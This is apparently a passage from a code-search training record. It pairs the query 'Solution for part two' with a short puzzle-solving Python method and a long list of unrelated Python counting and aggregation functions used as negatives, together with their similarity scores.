+\n int(player_definition['right_players']))", "def aggregate_results(results):\n\n for (config,con,dec),folds in results.iteritems():\n m = MODEL_PATTERN.match(config)\n if m:\n mode = m.groupdict()['mode'] # mle, rl, mrt, ...\n model = m.groupdict()['model'] # haem, hacm, hard, ...\n align = m.groupdict()['align'] # crp, cls ...\n else:\n mode, model, align = '', '', ''\n # mean accuracies across seeds for each fold\n foldaccuracies = []\n # we count number of models over folds and seeds\n num_individual_models = 0\n\n for foldname,fold in folds.items():\n if 'Q' in options.mode:\n seedaccurracies = fold.values()[:1] if fold.values() else [] # pick one\n# 
SUPPORT_STATISTICS[(config,con,dec,model,align,mode,foldname)] += 1\n else:\n seedaccurracies = []\n for seed_acc in fold.values():\n seedaccurracies.append(seed_acc)\n SUPPORT_STATISTICS[(config,con,dec,model,align,mode,foldname)] += 1\n # aggregate on fold level\n fold['__MEAN__'] = float(np.mean(seedaccurracies))\n fold['__SD__'] = float(np.std(seedaccurracies))\n l = len(seedaccurracies)\n num_individual_models += l\n SUPPORT_STATISTICS[(config,con,dec,model,align,mode,'__MEAN__')] += l\n SUPPORT_STATISTICS[(config,con,dec,model,align,mode,'__SD__')] += l\n\n # statistics over seeds for this fold\n fold['__STATS__'] = fold['__MEAN__'], fold['__SD__'], l\n foldaccuracies.append(fold['__MEAN__'])\n # aggregate on (config, condition, decoding) level\n folds['__MEAN__'] = float(np.mean(foldaccuracies))\n folds['__SD__'] = float(np.std(foldaccuracies))\n # statistics over folds for this (config, condition, decoding)\n folds['__STATS__'] = folds['__MEAN__'], folds['__SD__'], num_individual_models", "def count():", "def AnalyzeOrg(org_details, env_details, skip_traits = []):\n max_phen_score = len(env_details) - len(skip_traits)\n phenotype_score = 0\n for trait in env_details:\n if trait in skip_traits: continue\n trait_name = trait_map[trait].lower()\n expression = org_details[trait_name]\n if expression == \"1\" and env_details[trait] == \"1\": # True positive (+1)\n phenotype_score += 1\n elif expression == \"0\" and env_details[trait] == \"-1\": # True negative (+1)\n phenotype_score += 1\n elif expression == \"1\" and env_details[trait] == \"-1\": # False positive (-1)\n phenotype_score -= 1\n elif expression == \"0\" and env_details[trait] == \"1\": # False negative (-1)\n phenotype_score -= 1\n else:\n print \"Unexpected expression/environment case!\"\n exit(-1)\n return {\"max_score\": max_phen_score, \"score\": phenotype_score}", "def eval_randoms(count):\n\t\tfor person in Simulation.community:\n\t\t\tSimulation.community[person].eval_random_strategy(count)", "def runcount(test_keys, sigma, sigma_max, sigma_step,\n npoints_min, npoints_max, npoints_step):\n run = 1\n for key in test_keys:\n if key:\n while sigma < sigma_max:\n npoints = npoints_min\n while npoints < npoints_max:\n npoints += npoints_step\n run += 1\n sigma += sigma_step\n return run", "def simulate_counts(self, C, seed=None, reverse=False, **contract_opts):\n p_dense = self.to_dense(reverse=reverse, **contract_opts)\n return qu.simulate_counts(p_dense, C=C, seed=seed)", "def how_many(cls):\n print(\"We have {:d} robots.\".format(cls.population))", "def how_many(cls):\n print(\"We have {:d} robots.\".format(cls.population))", "def chance(dice):\n return sum(dice)", "def count_anyone_answered(group: list) -> int:\n return len(functools.reduce(lambda a, b : a + b, [collections.Counter(answers) for answers in group]))", "def count_amenity(src_points, candidates, rad):\n # Create tree from the candidate points\n tree = BallTree(candidates, leaf_size=15, metric='haversine')\n\n # Get distance and index of nearest amenity\n dist, nearest_ind = tree.query(src_points, k=1)\n\n dist = dist * 6371000\n # Count number of amenity within radius\n count = tree.query_radius(src_points, r=rad, count_only=True)\n # Get indexes of all the amenity within radius\n all_ind = tree.query_radius(src_points, r=rad)\n\n return count, dist.ravel(), nearest_ind, all_ind\n\n # Return the number of schools within the distance for each apartment wrt sale date", "def take_attendance():\n\t\tcount = 0\n\t\tfor person in 
Simulation.community:\n\t\t\tif Simulation.community[person].went_to_bar():\n\t\t\t\tcount += 1\n\t\tprint(count)\n\t\tStrategy.evalScore(count)\n\t\tSimulation.eval_randoms(count)\n\t\tSimulation.add_to_memory(count)", "def nmodes(self):\n if self.mode_selection is not None:\n return len(self.mode_selection)\n else:\n return len(self.mol.normal_modes.modes.freqs)", "def count(self, cp, min_surf, max_price, ad_type, nb_room_min):\n _cp = []\n if type(cp) is list:\n for c in cp:\n _cp.append(self.get_location(c))\n else:\n _cp.append(get_location(cp))\n \n SEARCH_PAYLOAD = [\n {\n \"includeNewConstructions\": True,\n \"inseeCodes\": _cp,\n \"maximumPrice\": max_price,\n \"minimumLivingArea\": min_surf,\n \"realtyTypes\": 3,\n \"rooms\": range(nb_room_min, 5),\n \"transactionType\": self._map_type(ad_type)\n },\n ]\n \n COUNT_URL = \"https://api-seloger.svc.groupe-seloger.com/api/v1/listings/count\"\n \n r = requests.post(COUNT_URL, data=json.dumps(SEARCH_PAYLOAD), headers=self.headers)\n return r.json()[0]", "def organismsCount(self) -> int:\n return self.group.organismsCount", "def _collect_counts(self):\n for t in self.system.keys():\n if t in self.gold:\n self.tp += 1\n else:\n self.fp += 1\n for t in self.gold.keys():\n if t not in self.system:\n self.fn += 1", "def venue_size(venue):\n if venue == \"ws\":\n return 100\n elif venue in [\"acl\", \"aacl\", \"naacl\", \"emnlp\", \"coling\", \"lrec\"]:\n return 50\n else:\n return 1", "def get_population(self):\n population = 0\n for i in self:\n population += i.count(self.cell_state['alive'])\n return population", "def count_amino_acids(self):\n n = 0\n for chain in self.iter_chains():\n n += chain.count_amino_acids()\n return n", "def appearances(size, target):\n appears = 0\n for i in range(1, size + 1):\n for j in range(1, size + 1):\n if i * j == target:\n appears += 1\n return appears", "def get_number_of_ions(exp_builder, phase, system_id):\n # Read in output pdb file to read ionic strength.\n if phase == 'complex' or phase == 'solvent1':\n phase_id = 0\n else:\n phase_id = 1\n system_filepath = exp_builder._db.get_system_files_paths(system_id)[phase_id].position_path\n system_filepath = os.path.splitext(system_filepath)[0] + '.pdb'\n system_traj = mdtraj.load(system_filepath)\n\n # Count number of waters and ions.\n n_waters = 0\n n_pos_ions = 0\n n_neg_ions = 0\n for res in system_traj.topology.residues:\n if res.is_water:\n n_waters += 1\n elif '+' in res.name:\n n_pos_ions += 1\n elif '-' in res.name:\n n_neg_ions += 1\n\n # Verify that number of ions roughly models the expected ionic strength.\n try:\n solvent_id = exp_builder._db.systems[system_id]['solvent']\n except KeyError:\n solvent_id = exp_builder._db.systems[system_id][phase] # solvent1 or solvent2\n ionic_strength = exp_builder._db.solvents[solvent_id]['ionic_strength']\n n_ionic_strength_ions = int(np.round(n_waters * ionic_strength / (55.41*unit.molar)))\n\n return n_pos_ions, n_neg_ions, n_ionic_strength_ions", "def get_n_owned_games(file_size):\n df = pd.read_csv('Resources/formateddataset{0}.csv.gz'.format(file_size), compression='gzip', usecols=['steamid', 'rating'])\n nGames = df[(df.rating == 1.0)].groupby(by=['steamid']).rating.count().reset_index()\n nGames.columns = ['steamid', 'nGames']\n return(nGames)", "def update_mean_and_count(self, strat_profile, game_outcome):\n self.total_interactions += 1\n for k in range(self.G.n_players):\n self.mu[k][strat_profile] *= self.count[k][strat_profile]\n self.mu[k][strat_profile] += game_outcome[k]\n 
self.count[k][strat_profile] += 1\n self.mu[k][strat_profile] /= self.count[k][strat_profile]\n\n for s in self.V:\n self.count_history[s].append(self.count[0][s] /\n float(self.total_interactions))", "def get_number_of_ver_sponsors(model):\n n_agents = len([k for k, v in model.schedule.agents_by_type['Customer'].items() if v.__class__.__name__ == 'VerificationSponsor'])\n return n_agents", "def enrollment_counts(cls, course_id):\r\n # Unfortunately, Django's \"group by\"-style queries look super-awkward\r\n query = use_read_replica_if_available(cls.objects.filter(course_id=course_id, is_active=True).values('mode').order_by().annotate(Count('mode')))\r\n total = 0\r\n d = defaultdict(int)\r\n for item in query:\r\n d[item['mode']] = item['mode__count']\r\n total += item['mode__count']\r\n d['total'] = total\r\n return d", "def amine(listAmine, count):\n \n for type in listAmine.keys():\n for nitrogen in listAmine[type]:\n nbNeighbor = numberNeigthbor(nitrogen[\"neighbors\"])\n for neighbor in nitrogen[\"neighbors\"]:\n if not nbNeighbor in count[type].keys():\n count[type][nbNeighbor] = structure.countElements()\n if not nbNeighbor in count[\"GlobalAmine\"].keys():\n count[\"GlobalAmine\"][nbNeighbor] = structure.countElements()\n\n\n if neighbor[\"element\"] in count[type][nbNeighbor].keys():\n count[type][nbNeighbor][neighbor[\"element\"]] = count[type][nbNeighbor][neighbor[\"element\"]] + 1\n count[\"GlobalAmine\"][nbNeighbor][neighbor[\"element\"]] = count[\"GlobalAmine\"][nbNeighbor][neighbor[\"element\"]] + 1\n\n else:\n count[type][nbNeighbor][\"others\"] = count[type][nbNeighbor][\"others\"] + 1\n count[\"GlobalAmine\"][nbNeighbor][\"others\"] = count[\"GlobalAmine\"][nbNeighbor][\"others\"] + 1", "def total_occupancy_modifier(frame, data):\n\n occupancies = data.particles['Occupancy'][...]\n site_type = data.particles['Particle Type'][...]\n num_site_types = occupancies.shape[1] #Accessing the number of columns in the Occupancy matrix\n total_occupancy = np.sum(occupancies, axis=1) #Summing over all columns\n # NOTE By convention, the first half of types is Si, the second half is C\n is_si_site = site_type <= num_site_types//2\n is_c_site = site_type > num_site_types//2\n si_occupancy = np.sum(occupancies[:, :(num_site_types//2)], axis=1)\n c_occupancy = np.sum(occupancies[:, (num_site_types//2):], axis=1)\n data.particles_.create_property('Total Occupancy', data=total_occupancy.astype(int))\n data.particles_.create_property('Is Si Site', data=is_si_site.astype(int))\n data.particles_.create_property('Is C Site', data=is_c_site.astype(int))\n data.particles_.create_property('Si Occupancy', data=si_occupancy.astype(int))\n data.particles_.create_property('C Occupancy', data=c_occupancy.astype(int))", "def AnalyzeOrgSimple(org_details, env_details, skip_traits = []):\n max_phen_score = len(env_details) - len(skip_traits)\n phenotype_score = 0\n for trait in env_details:\n if trait in skip_traits: continue\n trait_name = trait_map[trait].lower()\n expression = org_details[trait_name]\n if expression == \"1\" and env_details[trait] == \"1\": # True positive (+1)\n phenotype_score += 1\n elif expression == \"1\" and env_details[trait] == \"-1\": # False positive (-1)\n phenotype_score -= 1\n return {\"max_score\": max_phen_score, \"score\": phenotype_score}", "def of_a_kind_size(dice_list):\n return max([dice_list.count(value) for value in range(1,7)])", "def get_abundance_of_agent(self, query_agent) -> int:\n if type(query_agent) is not KappaAgent:\n query_agent = 
KappaAgent(query_agent)\n abundance = 0\n for cx, cx_ab in self.get_all_complexes_and_abundances():\n intra_cx_ab = cx.get_number_of_embeddings_of_agent(query_agent)\n abundance += intra_cx_ab * cx_ab\n return abundance", "def heuristic(self, state: ODState) -> int:\n h = 0\n if self.assigned_goals is None:\n for agent in state.new_agents:\n h += self.grid.get_heuristic(agent.coords, agent.color)\n for j in range(len(state.new_agents), len(state.agents)):\n h += self.grid.get_heuristic(state.agents[j].coords, state.agents[j].color)\n else:\n for agent in state.new_agents:\n h += self.grid.get_heuristic(agent.coords, self.assigned_goals[agent.id])\n for j in range(len(state.new_agents), len(state.agents)):\n h += self.grid.get_heuristic(state.agents[j].coords, self.assigned_goals[state.agents[j].id])\n return h", "def run_tournament(agents, randomize_round_num=True):\r\n\r\n for a in agents:\r\n try:\r\n a.load_payoff_conditions(payoffs)\r\n except Exception as e:\r\n pass\r\n\r\n score_dict = {}\r\n\r\n for a in agents:\r\n score_dict[a.name] = 0\r\n\r\n for (a1, a2) in itertools.product(agents, agents):\r\n\r\n if randomize_round_num:\r\n match_rounds = random.randint(min_rounds, max_rounds)\r\n else:\r\n match_rounds = rounds\r\n\r\n (a1_score, a2_score) = run_match(a1, a2, match_rounds, payoffs)\r\n\r\n score_dict[a1.name] += a1_score\r\n score_dict[a2.name] += a2_score\r\n\r\n return score_dict", "def observed_species(counts):\n return (counts!=0).sum()", "def evaluate(env, agent, n_games=1):\n t_max = env.spec.timestep_limit or 1000\n rewards = []\n\n for _ in range(n_games):\n s = env.reset()\n reward = 0.0\n for _ in range(t_max):\n action = agent.get_action(np.array([s]))\n s, r, done, _ = env.step(action)\n reward += r\n if done: break\n\n rewards.append(reward)\n\n return np.mean(rewards)", "def count_sheeps(arrayOfSheeps):\n count = 0\n for i in arrayOfSheeps:\n if i == True:\n count += 1\n return count", "def count(self, score_type=\"try\"):\n df = self.scores\n try:\n return df[df['type']==score_type].count()['value']\n except KeyError:\n return 0", "def summarize(allowances):\n total_allowances = 0\n if isinstance(allowances, dict):\n for key, value in allowances.items():\n total_allowances = total_allowances + int(value)\n #end for\n else:\n total_allowances = allowances\n return total_allowances", "def get_game_count(console_name: str) -> int:\n c = df.groupby('Platform')\n return c['Name'].count()[console_name]", "def ncusps(self):\n n = self.level()\n return sum([arith.euler_phi(arith.gcd(d,n//d)) for d in n.divisors()])", "def sixes_points(dice_list):\n return dice_list.count(6) * 6", "def _abilities_all_units(self) -> Counter:\n abilities_amount = Counter()\n for unit in self.units + self.structures: # type: Unit\n for order in unit.orders:\n abilities_amount[order.ability] += 1\n if not unit.is_ready:\n if self.race != Race.Terran or not unit.is_structure:\n # If an SCV is constructing a building, already_pending would count this structure twice\n # (once from the SCV order, and once from \"not structure.is_ready\")\n abilities_amount[self._game_data.units[unit.type_id.value].creation_ability] += 1\n\n return abilities_amount", "def test_count_neighbors(self):\n m, n = 5, 5\n k, p = 0.2, 0.7\n agents = [ConwayAgent(ii, ii & 0x1 == 1) for ii in range(m * n)]\n C = ConwayModel(m, n, k, p, agents)\n\n to_count = np.array([[0, 1, 0], [0, 0, 1], [1, 0, 0]])\n expected = np.array([[1, 1, 2], [2, 3, 1], [0, 2, 1]])\n result = C.count_neighbors(to_count)\n 
self.assertTrue(np.all(expected == result))", "def model_numel(model, param_dims=[2, 4], param_types=['weight', 'bias']):\n total_numel = 0\n for name, param in model.state_dict().items():\n # Extract just the actual parameter's name, which in this context we treat as its \"type\"\n if param.dim() in param_dims and any(type in name for type in param_types):\n total_numel += torch.numel(param)\n return total_numel", "def _count_parties(data_set): #DEMOCRATS, THEN REPUBLICANS\r\n reps = 0\r\n dems = 0\r\n for data_point in data_set:\r\n if data_point.dat_party == \"R\": reps+=1\r\n if data_point.dat_party == \"D\": dems+=1\r\n\r\n return (dems, reps)", "def count_umls(self) -> int:\n return self._count_model(Umls)", "def monte_carlo_estimate(self,var,e,n):\n\t\tncpt = self.variables[var].cpt\n\t\tncount = dict((value,0) for value in ncpt.values())\n\t\tesum = 0\n\t\tfor iter in xrange(n):\n sample = self.monte_carlo_sample()\n if all(sample[key]==value for (key,value) in e.iteritems()):\n #sample agrees with e\n ncount[sample[var]] += 1\n esum += 1\n if esum==0: return 'Undefined'\n for value in ncount.iterkeys():\n ncount[value] = float(ncount[value])/float(esum)\n return ncount", "def _count_occupied_seats(grid: List[List[str]]) -> int:\n total = 0\n for row in grid:\n total += row.count('#')\n return total", "def experiment(agent, steps, runs, initialize=None):\n result = 0\n for r in range(runs):\n result += simulate(agent, steps, initialize)\n return result / runs", "def how_many(cls):\n #cls.population equivalent to Robot.population\n print(\"We have {:d} robots.\".format(cls.population))", "def comitentes_count(self):\n return self.expedientepersona_set.filter(comitente=True).count()", "def count_houses_delivered_with_robot(s):\n s_santa, s_robot = s[::2], s[1::2]\n deliveries_santa = make_deliveries(s_santa)\n deliveries_robot = make_deliveries(s_robot)\n all_deliveries = combine_dicts(deliveries_santa, deliveries_robot, lambda x,y: x+y, 0)\n return len(all_deliveries)", "def get_nucliators_num_and_proba(self):\n XY = self.XY\n TIMES = self.die_times\n # CHEN'S IMPLEMENTATION\n # nucliators = np.array([True for i in range(len(TIMES))])\n # leaders = np.array([-1 for i in range(len(TIMES))])\n # cells_idx_sorted_by_times = np.arange(0, len(TIMES), 1)\n # for cell_idx in cells_idx_sorted_by_times:\n # # nucliators[cell_idx] = True\n # cell_death = TIMES[cell_idx]\n # neighbors_prior_death = [True for i in range(len(self.neighbors_list[cell_idx]))]\n # for neighbor_idx in self.neighbors_list[cell_idx]:\n # # if nucliators[cell_idx] == True:\n # # break\n # neighbor_death = TIMES[neighbor_idx]\n # if cell_death > neighbor_death:# and leaders[cell_idx] == -1:\n # nucliators[cell_idx] = False\n # # leaders[cell_idx] = cell_idx\n # elif cell_death == neighbor_death and not nucliators[neighbor_idx]:\n # nucliators[cell_idx] = False\n # leaders[cell_idx] = cell_idx\n # else:\n # nucliators[cell_idx] = True\n # # if leaders[neighbor_idx] != -1:\n # # leaders[cell_idx] = leaders[neighbor_idx]\n #\n # self.nucliators = nucliators\n # self.nucliators_num = nucliators.sum()\n # self.nucliation_proba = self.nucliators_num / len(XY)\n\n # MY IMPLEMENTATION\n self.nucliators = self.nucliators_counter.calc_nucliators()\n self.nucliators_num = self.nucliators.sum()\n self.nucliation_proba = self.nucliators_num / len(self.XY)", "def compute_detection_counts(kinds, valid_mask, aoi_mask, scene_counts):\n scene_counts = np.maximum(scene_counts, 1)\n if len(kinds):\n pairs = (kinds == 'pair_trawlers')\n 
singles = (kinds == 'single_trawler')\n scales = (kinds == 'pair_trawlers') * 2 + (kinds == 'single_trawler')\n aoi_pts = round((scales * (valid_mask & aoi_mask) / scene_counts).sum(), 1) \n aoi_pairs = round((pairs * (valid_mask & aoi_mask) / scene_counts).sum(), 1) \n else:\n aoi_pts = aoi_pairs = 0\n return aoi_pts, aoi_pairs", "def _get_n_players(env):\n return len(env.action_space.spaces)", "def test_winners_per_type_num_players(self):\n type_of_player = [ss.Player, ss.LazyPlayer, ss.ResilientPlayer]\n sim = ss.Simulation(player_field=type_of_player)\n run = sim.winners_per_type()\n assert list(run.keys()) == ['Player', 'LazyPlayer', 'ResilientPlayer']" ]
[ "0.56811786", "0.5137774", "0.5076857", "0.503548", "0.4957199", "0.4900915", "0.48782182", "0.4876376", "0.48688662", "0.48500103", "0.47992226", "0.47777793", "0.475898", "0.4754263", "0.47437844", "0.47234103", "0.47161484", "0.4714737", "0.4711583", "0.47112495", "0.47099024", "0.4708766", "0.4707552", "0.47072753", "0.4702373", "0.46961015", "0.46789366", "0.46784815", "0.46740007", "0.46648973", "0.46633115", "0.46581325", "0.46530733", "0.46491018", "0.4634963", "0.46328086", "0.4631801", "0.46183288", "0.46117324", "0.45982337", "0.45978847", "0.45943323", "0.45886838", "0.45816198", "0.45783046", "0.4574515", "0.45697555", "0.45671365", "0.4560227", "0.455644", "0.45560116", "0.45514458", "0.45514458", "0.454704", "0.45442635", "0.4533238", "0.45314878", "0.45238632", "0.45184755", "0.4509524", "0.45068043", "0.45067278", "0.45049015", "0.4502042", "0.45015028", "0.44991258", "0.449658", "0.4496522", "0.44943836", "0.44933853", "0.44924906", "0.44920737", "0.44884667", "0.4486083", "0.44832602", "0.44806686", "0.4474009", "0.4473817", "0.44720852", "0.44700083", "0.44646037", "0.44636193", "0.44635388", "0.44607636", "0.44599816", "0.44572014", "0.44528887", "0.44504642", "0.4449807", "0.44427797", "0.44374096", "0.4436504", "0.443321", "0.44316962", "0.44298926", "0.4428097", "0.44253218", "0.44200775", "0.44184005", "0.44030118" ]
0.65967184
0
Solution for part one.
def solve_part_one(self): self.initialize_values_and_rules() current_bot = None ret = None while True: for k in self.bots: if len(self.bots[k]) == 2: current_bot = k if current_bot is None: break low_type, dest_low, high_type, dest_high = self.rules[current_bot] chips = sorted(self.bots[current_bot]) if chips[0] == 17 and chips[1] == 61: ret = current_bot del self.bots[current_bot] current_bot = None self.assign(low_type, dest_low, chips[0]) self.assign(high_type, dest_high, chips[1]) return ret
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def task4_1(self):\n\n pass", "def exo2():", "def task4(self):\n\n pass", "def substantiate():", "def apply(self) -> None:", "def apply(self) -> None:", "def support(self):", "def mezclar_bolsa(self):", "def solve(self):", "def solvate(self):\n\n pass", "def falcon():", "def exercise_b2_106():\r\n pass", "def CL(self):", "def task3(self):\n\n pass", "def result(self):", "def result(self):", "def apply(self):", "def use(self):", "def exercise_b2_113():\r\n pass", "def process(self):", "def process(self):", "def process(self):", "def task5(self):\n\n pass", "def solve(self):\n ...", "def part1(_input):\n\n return None", "def main(self):", "def exercise_b2_107():\r\n pass", "def exercise_b2_52():\r\n pass", "def exercise_b2_69():\r\n pass", "def exercise_b2_53():\r\n pass", "def part_2():\n pass", "def degibber(self):", "def preprocess(self):", "def problem_298():\n pass", "def common(self):", "def exercise_b2_82():\r\n pass", "def decide():", "def part_5a():\n\n raise NotImplementedError", "def exercise_b2_70():\r\n pass", "def task1(self):\n \n pass", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def firstFunction(self):", "def one(self):", "def regular(self):", "def exercise_b2_27():\r\n pass", "def get_sol(self):", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def solve(self):\n pass", "def solve(self):\n pass", "def _build(self):", "def _build(self):", "def part2(_input):\n\n return None", "def part_6():\n\n raise NotImplementedError", "def _build_impl(self):", "def transform(self):", "def _regr_basic():", "def _prepare(self):", "def _prepare(self):", "def solution(self) -> State:", "def implement(self):\n\t#@DEBUG remove comments", "def _optimise(self):\n pass", "def exercise_b2_98():\r\n pass", "def __call__(self) -> None:", "def exercise_b2_43():\r\n pass", "def MINET(self):", "def pick_up(self):", "def task2(self):\n\n pass", "def test_get_solution(self):\n pass", "def input(self):", "def project(self, X):", "def project(self, X):" ]
[ "0.67894316", "0.6702227", "0.64681834", "0.6225672", "0.62181926", "0.62181926", "0.6214918", "0.62091845", "0.61323327", "0.6128199", "0.6067991", "0.60675985", "0.6043714", "0.602853", "0.60285074", "0.60285074", "0.60218054", "0.6005739", "0.5983086", "0.5963465", "0.5963465", "0.5963465", "0.5958028", "0.5914259", "0.5907054", "0.58979076", "0.58809215", "0.5875311", "0.58694124", "0.58687425", "0.58665264", "0.58538747", "0.5838984", "0.58384234", "0.58328587", "0.58266276", "0.578585", "0.57736856", "0.577261", "0.57643825", "0.57618344", "0.57618344", "0.57618344", "0.57618344", "0.57618344", "0.57618344", "0.57618344", "0.57618344", "0.57618344", "0.57618344", "0.5734593", "0.57321817", "0.57245797", "0.5713552", "0.57086414", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.56871223", "0.56871223", "0.5652655", "0.5652655", "0.56507707", "0.56500196", "0.56415653", "0.56257284", "0.5614916", "0.5610619", "0.5610619", "0.5598211", "0.5597677", "0.55940604", "0.5591433", "0.55902135", "0.5589901", "0.5582843", "0.55777407", "0.5571332", "0.55670774", "0.55647516", "0.55645126", "0.55645126" ]
0.0
-1
Solution for part two.
def solve_part_two(self): return self.outputs[0] * self.outputs[1] * self.outputs[2]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def exercise_b2_113():\r\n pass", "def exo2():", "def exercise_b2_82():\r\n pass", "def exercise_b2_106():\r\n pass", "def exercise_b2_52():\r\n pass", "def exercise_b2_69():\r\n pass", "def exercise_b2_53():\r\n pass", "def exercise_b2_27():\r\n pass", "def exercise_b2_107():\r\n pass", "def exercise_b2_98():\r\n pass", "def exercise_b2_70():\r\n pass", "def exercise_b2_95():\r\n pass", "def exercise_b2_26():\r\n pass", "def exercise_b2_43():\r\n pass", "def part2(_input):\n\n return None", "def exercise_b2_93():\r\n pass", "def two(self):", "def exercise_b2_39():\r\n pass", "def exercise_b2_56():\r\n pass", "def solve(self):", "def exercise_2b():\n\n return", "def task4_1(self):\n\n pass", "def exercise_b2_86():\r\n pass", "def substantiate():", "def part_2():\n pass", "def solution(s):", "def part1(_input):\n\n return None", "def solvate(self):\n\n pass", "def problem_298():\n pass", "def get_sol(self):", "def solution(self) -> State:", "def solve(self):\n ...", "def task4(self):\n\n pass", "def decide():", "def task2(self):\n\n pass", "def apply(self) -> None:", "def apply(self) -> None:", "def mezclar_bolsa(self):", "def prove_I2() -> Proof:\n # Optional Task 6.7a", "def solve(self):\n pass", "def solve(self):\n pass", "def task3(self):\n\n pass", "def apply(self):", "def part2a_0():\n xs = exampleInput\n phi = Counter({('-BEGIN-', '-FEAT-'): 1.0, ('-FEAT-', 'Beautiful'): 1.0, ('-FEAT-', 'PREV:-BEGIN-'): 1.0, ('-FEAT-', 'NEXT:2'): 1.0, ('-FEAT-', '-CAPITALIZED-'): 1.0, ('-FEAT-', '-POST-CAPITALIZED-'): 0.0})\n phi_ = submission.nerFeatureFunction(0, '-BEGIN-', '-FEAT-', xs)\n grader.requireIsTrue( Counters.approximateEquals(phi, phi_) )\n\n phi = Counter({('-FEAT-', '-SIZE-'): 1.0, ('-SIZE-', 'PREV:Beautiful'): 1.0, ('-SIZE-', 'NEXT:bedroom'): 1.0, ('-SIZE-', '-PRE-CAPITALIZED-'): 1.0, ('-SIZE-', '2'): 1.0, ('-SIZE-', '-POST-CAPITALIZED-'): 0.0, ('-SIZE-', '-CAPITALIZED-'): 0.0})\n phi_ = submission.nerFeatureFunction(1, '-FEAT-', '-SIZE-', xs)\n grader.requireIsTrue( Counters.approximateEquals(phi, phi_) )\n \n phi = Counter({('-SIZE-', '-SIZE-'): 1.0, ('-SIZE-', 'PREV:2'): 1.0, ('-SIZE-', 'bedroom'): 1.0, ('-SIZE-', 'NEXT:-END-'): 1.0, ('-SIZE-', '-CAPITALIZED-'): 0.0, ('-SIZE-', '-PRE-CAPITALIZED-'): 0.0})\n phi_ = submission.nerFeatureFunction(2, '-SIZE-', '-SIZE-', xs)\n grader.requireIsTrue( Counters.approximateEquals(phi, phi_) )", "def GetPoint2(self):\n ...", "def GetPoint2(self):\n ...", "def solution(self):\n return [(\"the\", 1579644)] * 100", "def main():\n data = read_data()\n print('Part one solution: {}'.format(part_one(data)))\n print('Part two solution: {}'.format(part_two(data)))", "def test_part_2(arguments, distance, output):\n assert part_2.solution(arguments, distance) == output", "def part_2(puzzle_input: Tuple[Number] = p1) -> Number:\n for (noun, verb) in permutations(range(len(p1)), 2):\n # Create a fresh copy for each run\n program = list(p1)\n restore_program(memory_updates={1: noun, 2: verb}, memory=program)\n c = Computer(program)\n c.run_program()\n if c.read(0) == 19_690_720:\n return 100 * noun + verb\n raise ExecutionError(\"Could not satisfy requirement\")", "def CL(self):", "def result(self):", "def result(self):", "def solve_2x2(self):\r\n # replace with your code\r\n assert self.row1_invariant(1), '2x2 Dont pass row1_invariant(1)'\r\n whole_move = ''\r\n current_position = self.current_position(0, 0)\r\n # print 'Zero position =', current_position\r\n counter = 0\r\n \r\n\r\n \r\n # if current_position == (0,0):\r\n # print (0,0)\r\n # 
move_to_00 = 'rdlu' \r\n if current_position == (0,1):\r\n # print (0,1)\r\n move_to_00 = 'l'\r\n if current_position == (1,0):\r\n # print (1,0)\r\n move_to_00 = 'u'\r\n if current_position == (1,1):\r\n # print (1,1)\r\n move_to_00 = 'ul'\r\n whole_move += move_to_00\r\n self.update_puzzle(move_to_00)\r\n # print self\r\n # print self.get_number(1,1) < self.get_number(1,0)\r\n \r\n while self.get_number(0,0) != 0 or self.get_number(0,1) != 1:\r\n \r\n # print 'Aloha in loop!'\r\n counter +=1\r\n move = 'rdlu'\r\n whole_move += move\r\n self.update_puzzle(move)\r\n # print self\r\n if counter >5:\r\n break\r\n return whole_move", "def solution(self):\n return [(\"the\", 1561900)] * 100", "def g(self):\n return 2", "def task5(self):\n\n pass", "def degibber(self):", "def task1(self):\n \n pass", "def _Schoof_mod2(self):\n if not self.b:\n result = 0\n _log.debug(\"(%d, 2) #\" % result)\n else:\n linearfactors = UniVarPolynomial({card(self.basefield):self.basefield.one, 1:-self.basefield.one}, self.basefield)\n if GCD(self.cubic, linearfactors).degree() == 0:\n result = 1\n _log.debug(\"(%d, 2) ##\" % result)\n else:\n result = 0\n _log.debug(\"(%d, 2) ###\" % result)\n return (result, 2)", "def test_part2_example1(example1):\n assert aoc.part2(example1) == 2 + 2 + 966 + 50346", "def 3Sat(B):", "def falcon():", "def calculate_output(self):", "def test_get_solution(self):\n pass", "def elementCom(Paire1,Paire2) :\n elem_com=\" \"\n elementPaire1=\" \"\n elementPaire2=\" \"\n p1 = Paire1[1]\n p2 = Paire2[1]\n if p1 != p2 :\n for i in range (2):\n for j in range (2):\n if p1[i] == p2[j]:\n elem_com = p1[i] \n elementPaire1 = p1[1-i] \n elementPaire2 = p2[1-j] \n return elem_com, elementPaire1, elementPaire2", "def solveOneStep(self):\n ### Student code goes here\n return True", "def exercise_4(inputs): # DO NOT CHANGE THIS LINE\n output = inputs\n\n return output # DO NOT CHANGE THIS LINE", "def problem_1b():\n # BEGIN_YOUR_ANSWER (our solution is 1 lines of code, but don't worry if you deviate from this)\n return 4\n # END_YOUR_ANSWER", "def SecondPart():\n return countAllBagsIn(targetBag, organizedBags)", "def testBeliefs2sk(self):", "def test_T2():\n infile = \"cisd/T2.in\"\n assert(os.path.exists(infile))\n with open(infile) as f:\n lines = f.readlines()\n assert(len(lines) == 10)\n\n hl1 = HirataLine(lines[0])\n assert(set(hl1.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl1.summation_indices == '')\n assert(hl1.prefactors == [\"+ 1.0 \"])\n assert(hl1.postfactors == ['v ( p3 p4 h1 h2 )'])\n assert(str(hl1) == lines[0].replace('\\n', ''))\n cl1 = Cc4sLine(hl1)\n assert(set(cl1.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl1.summation_indices == \"\")\n assert(cl1.prefactors == [\"+ 1.0 \"])\n assert(cl1.postfactors == 